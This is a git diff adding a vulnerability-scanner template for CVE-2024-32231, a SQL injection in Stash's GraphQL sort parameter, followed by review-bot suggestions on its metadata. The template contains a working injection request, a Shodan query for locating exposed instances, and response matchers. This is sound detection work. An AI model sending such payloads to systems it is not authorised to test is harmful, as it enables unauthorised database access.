diff --git a/http/cves/2024/CVE-2024-32231.yaml b/http/cves/2024/CVE-2024-32231.yaml
new file mode 100644
index 00000000000..08c2c1e66ec
--- /dev/null
+++ b/http/cves/2024/CVE-2024-32231.yaml
@@ -0,0 +1,46 @@
+id: CVE-2024-32231
+
+info:
+ name: Stash < 0.26.0 - SQL Injection
+ author: iamnoooob,rootxharsh,pdresearch
+ severity: critical
+ description: |
+ Stash up to v0.25.1 was discovered to contain a SQL injection vulnerability via the sort parameter.
+ reference:
+ - https://github.com/stashapp
+ - https://github.com/stashapp/stash
+ - https://github.com/stashapp/stash/pull/4865
+ - https://github.com/advisories/GHSA-75jf-52jg-qqh4
+ classification:
+ epss-score: 0.00045
+ epss-percentile: 0.16348
+ metadata:
+ verified: true
+ max-request: 1
+ shodan-query: html:"Stash"
+ tags: cve,cve2024,stash,sqli
+
+http:
+ - raw:
+ - |
+ POST /graphql HTTP/1.1
+ Host: {{Hostname}}
+ Content-type: application/json
+
+ {"operationName":"FindPerformers","variables":{"filter":{"q":"","page":1,"per_page":40,"sort":"name;select performers.id FROM performers union select group_concat(sqlite_version(),':')-- -","direction":"ASC"},"performer_filter":{}},"query":"query FindPerformers($filter: FindFilterType, $performer_filter: PerformerFilterType, $performer_ids: [Int!]) {\n findPerformers(\n filter: $filter\n performer_filter: $performer_filter\n performer_ids: $performer_ids\n ) {\n count\n performers {\n ...PerformerData\n __typename\n }\n __typename\n }\n}\n\nfragment PerformerData on Performer {\n id\n name\n disambiguation\n url\n gender\n twitter\n instagram\n birthdate\n ethnicity\n country\n eye_color\n height_cm\n measurements\n fake_tits\n penis_length\n circumcised\n career_length\n tattoos\n piercings\n alias_list\n favorite\n ignore_auto_tag\n image_path\n scene_count\n image_count\n gallery_count\n movie_count\n performer_count\n o_counter\n tags {\n ...SlimTagData\n __typename\n }\n stash_ids {\n stash_id\n endpoint\n __typename\n }\n rating100\n details\n death_date\n hair_color\n weight\n __typename\n}\n\nfragment SlimTagData on Tag {\n id\n name\n aliases\n image_path\n parent_count\n child_count\n __typename\n}"}
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ part: body
+ regex:
+ - 'converting driver\.Value type string \(\\"3.*?\\"\) to a int: invalid syntax'
+
+ - type: word
+ part: content_type
+ words:
+ - "application/json"
+
+ - type: status
+ status:
+ - 200
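Review bot: The `classification` block carries only the two EPSS fields, so a reader of this CVE template cannot see the weakness class or severity vector; add `cve-id: CVE-2024-32231` and `cwe-id: CWE-89`, and fill `cvss-metrics`/`cvss-score` from the linked GHSA advisory rather than leaving them out. An `info.remediation` line stating the fixed version, `remediation: Upgrade Stash to 0.26.0 or later`, lets a finding be actioned without following the references. The first two `reference` entries (the GitHub organisation and the repository root) describe nothing about the issue and could be dropped in favour of the pull request and advisory links already listed. The body regex anchors on a version string starting with `\"3` as it appears JSON-escaped inside the driver error, which looks intentional but deserves a one-line comment above the matcher, since a Stash release that stops echoing database driver errors would make the template silently miss affected hosts rather than fail loudly.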